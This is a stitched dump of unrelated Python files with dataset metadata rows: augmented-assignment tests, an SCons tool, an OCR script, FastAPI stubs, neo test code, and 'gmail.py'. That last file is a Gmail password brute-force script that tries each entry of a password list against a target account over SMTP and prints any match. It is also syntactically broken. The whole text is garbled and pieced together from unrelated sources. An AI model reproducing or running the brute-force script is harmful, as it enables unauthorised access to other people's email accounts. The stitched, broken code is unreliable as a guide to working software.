arquivo_0 = pasta_0 / 'arquivo_0.txt'
arquivo_0.exists() # True
arquivo_0.is_file # True
arquivo_0.suffix # .txt
arquivo_0.stem # arquivo_0
arquivo_0.read_text()
# 'files/pasta_0/arquivo_0.txt'
| 17.703704 | 49 | 0.700837 | 79 | 478 | 3.974684 | 0.379747 | 0.229299 | 0.207006 | 0.229299 | 0.324841 | 0.140127 | 0 | 0 | 0 | 0 | 0 | 0.042394 | 0.161088 | 478 | 26 | 50 | 18.384615 | 0.740648 | 0.112971 | 0 | 0 | 0 | 0 | 0.203349 | 0.138756 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0.0625 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
6ada06bcfa9bbdada08caf10d98edb9ed5f71ce8 | 4,514 | py | Python | test/tests/augassign.py | jonco3/dynamic | 76d10b012a7860595c7d9abbdf542c7d8f2a4d53 | [
"MIT"
] | 1 | 2020-11-26T23:37:19.000Z | 2020-11-26T23:37:19.000Z | test/tests/augassign.py | jonco3/dynamic | 76d10b012a7860595c7d9abbdf542c7d8f2a4d53 | [
"MIT"
] | null | null | null | test/tests/augassign.py | jonco3/dynamic | 76d10b012a7860595c7d9abbdf542c7d8f2a4d53 | [
"MIT"
] | null | null | null | # output: ok
input = [10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10]
expected = [11, 8, 30, 2.5, 2, 4, 10000000, 20, 2, 2, 14, 15]
def test(v):
v[0] += 1
v[1] -= 2
v[2] *= 3
v[3] /= 4
v[4] //= 5
v[5] %= 6
v[6] **= 7
v[7] <<= 1
v[8] >>= 2
v[9] &= 3
v[10] ^= 4
v[11] |= 5
return v
assert test(list(input)) == expected
class Wrapped:
def __init__(self, initial):
self.value = initial
def __eq__(self, other):
return self.value == other
def __iadd__(self, other):
self.value += other
return self
def __isub__(self, other):
self.value -= other
return self
def __imul__(self, other):
self.value *= other
return self
def __itruediv__(self, other):
self.value /= other
return self
def __ifloordiv__(self, other):
self.value //= other
return self
def __imod__(self, other):
self.value %= other
return self
def __ipow__(self, other):
self.value **= other
return self
def __ilshift__(self, other):
self.value <<= other
return self
def __irshift__(self, other):
self.value >>= other
return self
def __ior__(self, other):
self.value |= other
return self
def __iand__(self, other):
self.value &= other
return self
def __ixor__(self, other):
self.value ^= other
return self
assert test(list(map(Wrapped, input))) == expected
class Wrapped2:
def __init__(self, initial):
self.value = initial
def __add__(self, other):
return Wrapped(self.value + other)
def __sub__(self, other):
return Wrapped(self.value - other)
def __mul__(self, other):
return Wrapped(self.value * other)
def __truediv__(self, other):
return Wrapped(self.value / other)
def __floordiv__(self, other):
return Wrapped(self.value // other)
def __mod__(self, other):
return Wrapped(self.value % other)
def __pow__(self, other):
return Wrapped(self.value ** other)
def __lshift__(self, other):
return Wrapped(self.value << other)
def __rshift__(self, other):
return Wrapped(self.value >> other)
def __or__(self, other):
return Wrapped(self.value | other)
def __and__(self, other):
return Wrapped(self.value & other)
def __xor__(self, other):
return Wrapped(self.value ^ other)
assert test(list(map(Wrapped2, input))) == expected
class C:
def __init__(self, value):
self.value = value
o = C(1)
def incValue(self, other):
self.value += other
return self
o.__iadd__ = incValue
threw = False
try:
o += 1
except TypeError as e:
if "unsupported operand type" in str(e):
threw = True
assert threw
C.__iadd__ = incValue
o += 1
assert o.value == 2
class NonDataDescriptor:
def __get__(self, instance, owner):
def f(other):
o.value -= other
return o
return f
C.__iadd__ = NonDataDescriptor()
o += 1
assert o.value == 1
class D:
def __init__(self, initial):
self.value = initial
def __iadd__(self, other):
self.value += other
return self
def __add__(self, other):
return F(self.value - other)
class E:
def __init__(self, initial):
self.value = initial
def __iadd__(self, other):
self.value += other
return self
def __add__(self, other):
return NotImplemented
class F:
def __init__(self, initial):
self.value = initial
def __iadd__(self, other):
return NotImplemented
def __add__(self, other):
return F(self.value - other)
class G:
def __init__(self, initial):
self.value = initial
def __iadd__(self, other):
return NotImplemented
def __add__(self, other):
return NotImplemented
d = D(0); d += 1; assert d.value == 1
e = E(0); e += 1; assert e.value == 1
f = F(0); f += 1; assert f.value == -1
g = G(0);
threw = False
try:
g += 1
except TypeError:
threw = True
assert threw
assert g.value == 0
class H:
def __init__(self, initial):
self.value = initial
def __radd__(self, other):
return H(self.value + other)
h = 0; h += H(1); assert h.value == 1
# Test builtin stub reverses its arguments when required
def opt(a, b):
a += b
return a
assert opt(1, 1.5) == 2.5
assert opt(1, 1.5) == 2.5
print('ok')
| 23.268041 | 61 | 0.584626 | 610 | 4,514 | 4.02459 | 0.162295 | 0.14664 | 0.176782 | 0.10998 | 0.638697 | 0.626069 | 0.614664 | 0.561711 | 0.195112 | 0.195112 | 0 | 0.03392 | 0.294639 | 4,514 | 193 | 62 | 23.388601 | 0.737123 | 0.0144 | 0 | 0.371257 | 0 | 0 | 0.005848 | 0 | 0 | 0 | 0 | 0 | 0.083832 | 1 | 0.281437 | false | 0 | 0 | 0.11976 | 0.568862 | 0.005988 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
6aef32d96b642f7e1027413f538b1e4a32088548 | 458 | py | Python | xmlUtilLib.py | fermi-lat/xmlUtil | b1dc221207394c6e31ce3b91d95a67c0eeb8ab56 | [
"BSD-3-Clause"
] | null | null | null | xmlUtilLib.py | fermi-lat/xmlUtil | b1dc221207394c6e31ce3b91d95a67c0eeb8ab56 | [
"BSD-3-Clause"
] | null | null | null | xmlUtilLib.py | fermi-lat/xmlUtil | b1dc221207394c6e31ce3b91d95a67c0eeb8ab56 | [
"BSD-3-Clause"
] | null | null | null | # $Header: /nfs/slac/g/glast/ground/cvs/GlastRelease-scons/xmlUtil/xmlUtilLib.py,v 1.2 2009/08/06 23:59:48 jrb Exp $
def generate(env, **kw):
if not kw.get('depsOnly', 0):
env.Tool('addLibrary', library = ['xmlUtil'])
if env['PLATFORM'] == 'win32':
env.Tool('findPkgPath', package = 'xmlUtil')
env.Tool('xmlBaseLib')
env.Tool('facilitiesLib')
env.Tool('addLibrary', library = env['xercesLibs'])
def exists(env):
return 1;
| 35.230769 | 116 | 0.646288 | 64 | 458 | 4.625 | 0.6875 | 0.118243 | 0.114865 | 0.162162 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.052083 | 0.161572 | 458 | 12 | 117 | 38.166667 | 0.71875 | 0.248908 | 0 | 0 | 1 | 0 | 0.289474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
6af0bb5cfa1c474d50abf3d422c13b8bfda0c5b4 | 509 | py | Python | FenrTech SOLUTION-1/Image2Text/ImToStr1.py | MdNazmul9/PYTHON_CODE_ALL | 75046943f1bb6b4a010955b23bfe3f01cd08a473 | [
"MIT"
] | null | null | null | FenrTech SOLUTION-1/Image2Text/ImToStr1.py | MdNazmul9/PYTHON_CODE_ALL | 75046943f1bb6b4a010955b23bfe3f01cd08a473 | [
"MIT"
] | null | null | null | FenrTech SOLUTION-1/Image2Text/ImToStr1.py | MdNazmul9/PYTHON_CODE_ALL | 75046943f1bb6b4a010955b23bfe3f01cd08a473 | [
"MIT"
] | null | null | null | import cv2
import pytesseract
#pytesseract.pytesseract.tesseract_cmd = r'C:\\Program Files\\Tesseract-OCR\\tesseract.exe'
#pytesseract.pytesseract.tesseract_cmd = 'C:\\Program Files (x86)\\Tesseract-OCR\\tesseract.exe'
pytesseract.pytesseract.tesseract_cmd = r'C:\Users\User\AppData\Local\Tesseract-OCR\tesseract.exe'
img = cv2.imread('./BreakingNews.png')
text = pytesseract.image_to_string(img)
print(text)
img = cv2.imread('./BitCoin.jpeg')
text = pytesseract.image_to_string(img)
print(text) | 39.153846 | 99 | 0.766208 | 68 | 509 | 5.632353 | 0.397059 | 0.229765 | 0.24282 | 0.266319 | 0.610966 | 0.610966 | 0.511749 | 0.511749 | 0 | 0 | 0 | 0.01073 | 0.084479 | 509 | 13 | 100 | 39.153846 | 0.811159 | 0.363458 | 0 | 0.444444 | 0 | 0 | 0.279743 | 0.176849 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.222222 | 0 | 0.222222 | 0.222222 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
0a7b1cd2b2a1d357fd02ba117bde72a44afd1fa3 | 385 | py | Python | moban_tornado/__init__.py | PrajwalM2212/moban-tornado | c5279e7a643d11ff0881496a3b770ef2507d797a | [
"MIT"
] | 2 | 2019-02-24T11:59:19.000Z | 2019-02-24T11:59:19.000Z | moban_tornado/__init__.py | PrajwalM2212/moban-tornado | c5279e7a643d11ff0881496a3b770ef2507d797a | [
"MIT"
] | 3 | 2019-02-24T21:21:41.000Z | 2020-05-29T15:01:12.000Z | moban_tornado/__init__.py | moremoban/moban-tornado | c5279e7a643d11ff0881496a3b770ef2507d797a | [
"MIT"
] | null | null | null | from lml.plugin import PluginInfo, PluginInfoChain
import moban.constants as constants
from moban_tornado._version import __version__
from moban_tornado._version import __author__
PluginInfoChain(__name__).add_a_plugin_instance(
PluginInfo(
constants.TEMPLATE_ENGINE_EXTENSION,
"%s.engine.EngineTornado" % __name__,
tags=["Tornado", "tornado", ],
)
)
| 27.5 | 50 | 0.758442 | 41 | 385 | 6.512195 | 0.536585 | 0.067416 | 0.11985 | 0.172285 | 0.217228 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.161039 | 385 | 13 | 51 | 29.615385 | 0.826625 | 0 | 0 | 0 | 0 | 0 | 0.096104 | 0.05974 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.363636 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
0a8a59fbc9f9de431d6267755346bfe6e2daa160 | 767 | py | Python | strikethrough_removal/src/__init__.py | RaphaelaHeil/strikethrough-removal-cyclegans | 91555b22cac6b6a379597aa94c23bdf02c9970a7 | [
"MIT"
] | 3 | 2021-08-30T12:37:14.000Z | 2022-02-09T16:07:14.000Z | strikethrough_removal/src/__init__.py | ektavats/strikethrough-removal-cyclegans | 35456619ff87fa010d2c161cff774af02142bae9 | [
"MIT"
] | null | null | null | strikethrough_removal/src/__init__.py | ektavats/strikethrough-removal-cyclegans | 35456619ff87fa010d2c161cff774af02142bae9 | [
"MIT"
] | 1 | 2022-01-25T10:30:54.000Z | 2022-01-25T10:30:54.000Z | from .utils import PadToSize, composeTransformations, getDiscriminatorModels, getGeneratorModels, \
getPretrainedAuxiliaryLossModel
from .metrics import calculateRmse, calculateF1Score
from .dataset import StruckCleanDataset, ValidationStruckCleanDataset, TestDataset
from .configuration import StrikeThroughType, ExperimentType, FeatureType, ModelName, Configuration, getConfiguration
__all__ = ["PadToSize", "composeTransformations", "getDiscriminatorModels", "getGeneratorModels",
"getPretrainedAuxiliaryLossModel", "calculateRmse", "calculateF1Score", "StruckCleanDataset",
"ValidationStruckCleanDataset", "TestDataset", "StrikeThroughType", "ExperimentType", "FeatureType",
"ModelName", "Configuration", "getConfiguration"]
| 69.727273 | 117 | 0.801825 | 45 | 767 | 13.577778 | 0.488889 | 0.101473 | 0.173486 | 0.232406 | 0.595745 | 0.261866 | 0 | 0 | 0 | 0 | 0 | 0.002933 | 0.110821 | 767 | 10 | 118 | 76.7 | 0.892962 | 0 | 0 | 0 | 0 | 0 | 0.349413 | 0.134289 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.444444 | 0 | 0.444444 | 0 | 0 | 0 | 1 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
0a91db1805ccec96b3f71337475826f22f3896b4 | 283 | py | Python | attendees/persons/apps.py | xjlin0/attendees32 | 25913c75ea8d916dcb065a23f2fa68bea558f77c | [
"MIT"
] | null | null | null | attendees/persons/apps.py | xjlin0/attendees32 | 25913c75ea8d916dcb065a23f2fa68bea558f77c | [
"MIT"
] | 5 | 2022-01-21T03:26:40.000Z | 2022-02-04T17:32:16.000Z | attendees/persons/apps.py | xjlin0/attendees32 | 25913c75ea8d916dcb065a23f2fa68bea558f77c | [
"MIT"
] | null | null | null | from django.apps import AppConfig
class PersonsConfig(AppConfig):
name = "attendees.persons"
def ready(self):
# importing signal handlers # https://docs.djangoproject.com/en/dev/topics/signals/#preventing-duplicate-signals
import attendees.persons.signals
| 28.3 | 120 | 0.738516 | 32 | 283 | 6.53125 | 0.8125 | 0.15311 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.162544 | 283 | 9 | 121 | 31.444444 | 0.881857 | 0.381625 | 0 | 0 | 0 | 0 | 0.099415 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.4 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
0a9807c2f3907c5b205e154cd6248dfe4333924f | 183 | py | Python | update/venv/lib/python3.9/site-packages/fontTools/__init__.py | Imudassir77/material-design-icons | 63c5cb306073a9ecdfd3579f0f696746ab6305f6 | [
"Apache-2.0"
] | 38,667 | 2015-01-01T00:15:34.000Z | 2022-03-31T22:57:03.000Z | update/venv/lib/python3.9/site-packages/fontTools/__init__.py | azizhudai/material-design-icons | 63c5cb306073a9ecdfd3579f0f696746ab6305f6 | [
"Apache-2.0"
] | 1,192 | 2015-01-03T07:59:34.000Z | 2022-03-31T13:22:26.000Z | update/venv/lib/python3.9/site-packages/fontTools/__init__.py | azizhudai/material-design-icons | 63c5cb306073a9ecdfd3579f0f696746ab6305f6 | [
"Apache-2.0"
] | 11,269 | 2015-01-01T08:41:17.000Z | 2022-03-31T16:12:52.000Z | import logging
from fontTools.misc.loggingTools import configLogger
log = logging.getLogger(__name__)
version = __version__ = "4.22.1"
__all__ = ["version", "log", "configLogger"]
| 20.333333 | 52 | 0.754098 | 21 | 183 | 6 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.024845 | 0.120219 | 183 | 8 | 53 | 22.875 | 0.757764 | 0 | 0 | 0 | 0 | 0 | 0.153005 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
0abc3a801eabf7fb558efa2abc0fd1fd2967300a | 185 | py | Python | web/__init__.py | aHugues/default-flask | 4d6c8c95f9f93b1fccc56aa413f912c86bf99bc3 | [
"Apache-2.0"
] | 1 | 2019-04-13T20:13:37.000Z | 2019-04-13T20:13:37.000Z | web/__init__.py | aHugues/default-flask | 4d6c8c95f9f93b1fccc56aa413f912c86bf99bc3 | [
"Apache-2.0"
] | 1 | 2019-04-14T13:31:10.000Z | 2019-04-14T13:31:10.000Z | web/__init__.py | aHugues/porygon-indexer | 8d6c9ca912c95d01a73a36f87e173e2a450441e8 | [
"Apache-2.0"
] | null | null | null | from flask import Flask
from .views import main_views
def create_app(debug=False):
app = Flask(__name__)
app.debug = debug
app.register_blueprint(main_views)
return app | 23.125 | 38 | 0.740541 | 27 | 185 | 4.777778 | 0.518519 | 0.139535 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.189189 | 185 | 8 | 39 | 23.125 | 0.86 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.285714 | 0 | 0.571429 | 0.142857 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
0ad29e2d73a653c167863eb5398a68759438da21 | 123 | py | Python | ArchiveddashProblems/Problem_006.py | Utshaan/Archived_Problems | 423e8fc5db2dd5ee54a625cf8cbec2a8a271fcf3 | [
"MIT"
] | 1 | 2022-03-14T14:57:01.000Z | 2022-03-14T14:57:01.000Z | ArchiveddashProblems/Problem_006.py | Utshaan/Archived_Problems | 423e8fc5db2dd5ee54a625cf8cbec2a8a271fcf3 | [
"MIT"
] | 1 | 2022-03-13T12:33:07.000Z | 2022-03-13T12:50:42.000Z | ArchiveddashProblems/Problem_006.py | Utshaan/Archived_Problems | 423e8fc5db2dd5ee54a625cf8cbec2a8a271fcf3 | [
"MIT"
] | null | null | null | from fpack import SumofSquares, SquareofSum
x = int(input("number, now\n"))
a = SquareofSum(x) - SumofSquares(x)
print(a)
| 20.5 | 43 | 0.723577 | 18 | 123 | 4.944444 | 0.722222 | 0.269663 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130081 | 123 | 5 | 44 | 24.6 | 0.831776 | 0 | 0 | 0 | 0 | 0 | 0.105691 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0.25 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
0aec531afb01a71fa2d98ffd998050ce1a051ad6 | 3,078 | py | Python | app/api_v1/endpoints/kafka.py | endocode/fasten_api | a2f5c712fb0f39de664ef98543c21d3eb472d9e9 | [
"Apache-2.0"
] | null | null | null | app/api_v1/endpoints/kafka.py | endocode/fasten_api | a2f5c712fb0f39de664ef98543c21d3eb472d9e9 | [
"Apache-2.0"
] | null | null | null | app/api_v1/endpoints/kafka.py | endocode/fasten_api | a2f5c712fb0f39de664ef98543c21d3eb472d9e9 | [
"Apache-2.0"
] | null | null | null | from fastapi import APIRouter
from api_v1.endpoints.utils import connect_kafka
router = APIRouter()
@router.get("/")
async def root():
return {"message": "it's working!"}
@router.get("/{pkg_manager}/{product}/deps/{timestamp}")
def rebuild_dependency_net(pkg_manager: str, product: str, timestamp: int):
"""
Given a product and a timestamp, reconstruct its dependency network
Return: A set of revisions, along with an adjacency matrix
REST examples:
GET /api/mvn/org.slf4j:slf4j-api/deps/1233323123
GET /api/pypi/numpy/deps/1233323123?transitive=true
"""
msg = connect_kafka()
# TODO: send a kafka topic requesting a set of revisions
# TODO: read the kafka topic with the answer
# TODO: transform the data from kafka (if necessary)
# TODO: return the set of revisions
return msg
@router.get("/{pkg_manager}/{product}/cg/{timestamp}")
def get_call_graph():
"""
Given a product and a timestamp, retrieve its call graph
Use case: A user wants to run a custom analysis locally.
Return: A JSON-serialized RevisionCallGraph
REST examples:
GET /api/mvn/org.slf4j:slf4j-api/cg/1233323123
GET /api/pypi/numpy/cg/1233323123?transitive=true
"""
pass
@router.get("/{pkg_manager}/{product}/{version}")
def get_metadata():
"""
Given a product and a version, retrieve all known metadata
Return: All known metadata for a revision
REST examples:
GET /api/mvn/org.slf4j:slf4j-api/1.7.29
GET /api/pypi/numpy/1.15.2
"""
pass
@router.get("/{pkg_manager}/{product}/{version}/vulnerabilities")
def get_vulnerabilities():
"""
Vulnerabilities in the transitive closure of a package version
Expected result, in order of detail
- Paths of revisions,
- Paths of files / compilation units,
- Paths of functions
REST examples:
GET /api/mvn/org.slf4j:slf4j-api/1.7.29/vulnerabilities
GET /api/pypi/numpy/1.15.2/vulnerabilities
"""
pass
@router.post("/{pkg_manager}/{product}/{version}/impact")
def post_():
"""
Impact analysis
Use case: the user asks the KB to compute the impact of a semantic change
to a function
Exapected result: The full set of functions reachable from the provided
function
REST examples:
POST /api/mvn/org.slf4j:slf4j-api/1.7.29/impact
POST /api/mvn/org.slf4j:slf4j-api/1.7.29/impact?transitive=true
The post body contains a FASTEN URI
"""
# TODO: need to clarify this use case
pass
@router.post("/{pkg_manager}/{product}/{version}/cg")
def update_cg():
"""
Update the static CG of a package version with new edges
Use case: A user runs an instrumented test suite locally and decides to
update the central call graph with edges that do not exist due to
shortcomings in static analysis.
Expected result: A list of edges that where added.
REST examples:
POST /api/mvn/org.slf4j:slf4j-api/1.7.29/cg
POST /api/pypi/numpy/1.15.2/cg
"""
pass
| 25.229508 | 77 | 0.675763 | 443 | 3,078 | 4.654628 | 0.327314 | 0.023278 | 0.030553 | 0.047527 | 0.318623 | 0.260912 | 0.227934 | 0.13676 | 0.13676 | 0.100873 | 0 | 0.036205 | 0.219298 | 3,078 | 121 | 78 | 25.438017 | 0.821889 | 0.648798 | 0 | 0.2 | 0 | 0 | 0.310875 | 0.286052 | 0 | 0 | 0 | 0.016529 | 0 | 1 | 0.24 | false | 0.2 | 0.08 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
0aeea2abe861dcfc38b00218cc263c0a631c1760 | 1,674 | py | Python | gmail.py | NH-web/NH-gmail | 17ff1eadabca534da8bda8761445418f18f14c30 | [
"Apache-2.0"
] | 2 | 2020-10-11T14:53:21.000Z | 2022-01-02T12:49:21.000Z | gmail.py | NH-web/NH-gmail | 17ff1eadabca534da8bda8761445418f18f14c30 | [
"Apache-2.0"
] | null | null | null | gmail.py | NH-web/NH-gmail | 17ff1eadabca534da8bda8761445418f18f14c30 | [
"Apache-2.0"
] | null | null | null | import smtplib
import time
import subprocess
from datetime import datetime
r = "033[1;91m"
g = "033[1;32m"
s = g + "+"
print (g +'-'*60)
print ("")
print ('['+s+']starting your tool and updating the programm')
print ("")
print (g +'-'*60)
time.sleep(5)
print (g'/...\.....starting the server' + g +'/....//../'*1000)
subprocess.call('clear',SHELL=True)
while True:
print ('play song for more motivation!......')
subprocess.call("play-audio 'Eminem_-_Escape_feat._Hopsin_(2019)(360p).mp3'",SHELL=True)
print ('now let-us start.....')
def usage():
print ('USAGE: python gmail.py <GMAIL> <PASSLIST>')
print (' {{{{{ }}}}} ')
print (' {{{{ }}}} ')
print (' {{{{ NNNNNNNN NNNN HHHH HHHH }}}} ')
print (' {{{{ NNNNNNNNN NNNN HHHH HHHH }}}} ')
print ('{{{{ NNNNN NNNN NNNN HHHHHHHHHHH }}}} ')
print (' {{{{ NNNNN NNNN NNNN HHHHHHHHHHH }}}} ')
print (' {{{{ NNNNN NNNNNNNN HHHH HHHH }}}} ')
print (' {{{{{ NNNNN NNNNNNN HHHH HHHH }}}} ')
print (' {{{{{{ }}}}} ')
target = str(sys.argv[1])
passw = str(sys.argv[2])
s = smtplib.SMTP('smtp.gmail.com',587)
def start():
for password in passw:
try:
passww = s.login(target,password)
t1 = datetime.now()
print ('started at:{0}'.format(t1))
print ('[+]password Found:%s'%passww)
except:
print ('[-]Attempting password:%s'%password)
print (len(sys.argv))
if len(sys.argv) != 3:
usage()
else:
start()
t2 = datetime.now()
total = t2 - t1
print ('finished in :{0}'.format(total))
| 27.9 | 92 | 0.519713 | 193 | 1,674 | 4.481865 | 0.466321 | 0.046243 | 0.060116 | 0.039306 | 0.078613 | 0.078613 | 0.078613 | 0 | 0 | 0 | 0 | 0.034426 | 0.271207 | 1,674 | 59 | 93 | 28.372881 | 0.67459 | 0 | 0 | 0.16 | 0 | 0 | 0.449492 | 0.028093 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.12 | 0.08 | null | null | 0.46 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 3 |
7c145f3f4175223e4ff7a27b6305b695ba73a77b | 136 | py | Python | multiplication/multiplication.py | Vino2001-hub/the-creative-vipers | 844c20e7f8dc6a69f64c17fba29d385b5dd21868 | [
"MIT"
] | null | null | null | multiplication/multiplication.py | Vino2001-hub/the-creative-vipers | 844c20e7f8dc6a69f64c17fba29d385b5dd21868 | [
"MIT"
] | null | null | null | multiplication/multiplication.py | Vino2001-hub/the-creative-vipers | 844c20e7f8dc6a69f64c17fba29d385b5dd21868 | [
"MIT"
] | 3 | 2021-04-18T14:20:45.000Z | 2021-04-18T15:12:42.000Z | def domultiplication:
a=68
b=10
print("Multiplication of 68*10=",a*b)#multiplication function is invoked
domultiplication()
| 22.666667 | 76 | 0.727941 | 18 | 136 | 5.5 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.070796 | 0.169118 | 136 | 5 | 77 | 27.2 | 0.80531 | 0.25 | 0 | 0 | 0 | 0 | 0.237624 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.2 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
7c1a4a7821a91fb68ddce6a8ad71199b67b52d2a | 47,543 | py | Python | neo/test/coretest/test_irregularysampledsignal.py | alafuzof/python-neo | 5fae976d1d944bf16285dc51f57d0e7d4c2c62ad | [
"BSD-3-Clause"
] | null | null | null | neo/test/coretest/test_irregularysampledsignal.py | alafuzof/python-neo | 5fae976d1d944bf16285dc51f57d0e7d4c2c62ad | [
"BSD-3-Clause"
] | null | null | null | neo/test/coretest/test_irregularysampledsignal.py | alafuzof/python-neo | 5fae976d1d944bf16285dc51f57d0e7d4c2c62ad | [
"BSD-3-Clause"
] | 1 | 2021-07-17T16:24:25.000Z | 2021-07-17T16:24:25.000Z | # -*- coding: utf-8 -*-
"""
Tests of the neo.core.irregularlysampledsignal.IrregularySampledSignal class
"""
import unittest
import os
import pickle
import warnings
from copy import deepcopy
import numpy as np
import quantities as pq
from numpy.testing import assert_array_equal
from neo.core.dataobject import ArrayDict
try:
from IPython.lib.pretty import pretty
except ImportError as err:
HAVE_IPYTHON = False
else:
HAVE_IPYTHON = True
from neo.core.irregularlysampledsignal import IrregularlySampledSignal
from neo.core import Segment, ChannelIndex
from neo.core.baseneo import MergeError
from neo.test.tools import (assert_arrays_almost_equal, assert_arrays_equal,
assert_neo_object_is_compliant, assert_same_sub_schema,
assert_same_attributes, assert_same_annotations,
assert_same_array_annotations)
from neo.test.generate_datasets import (get_fake_value, get_fake_values, fake_neo,
TEST_ANNOTATIONS)
class Test__generate_datasets(unittest.TestCase):
def setUp(self):
np.random.seed(0)
self.annotations = dict(
[(str(x), TEST_ANNOTATIONS[x]) for x in range(len(TEST_ANNOTATIONS))])
def test__get_fake_values(self):
self.annotations['seed'] = 0
times = get_fake_value('times', pq.Quantity, seed=0, dim=1)
signal = get_fake_value('signal', pq.Quantity, seed=1, dim=2)
name = get_fake_value('name', str, seed=2, obj=IrregularlySampledSignal)
description = get_fake_value('description', str, seed=3, obj='IrregularlySampledSignal')
file_origin = get_fake_value('file_origin', str)
arr_ann = get_fake_value('array_annotations', dict, seed=5,
obj=IrregularlySampledSignal, n=1)
attrs1 = {'name': name, 'description': description, 'file_origin': file_origin}
attrs2 = attrs1.copy()
attrs2.update(self.annotations)
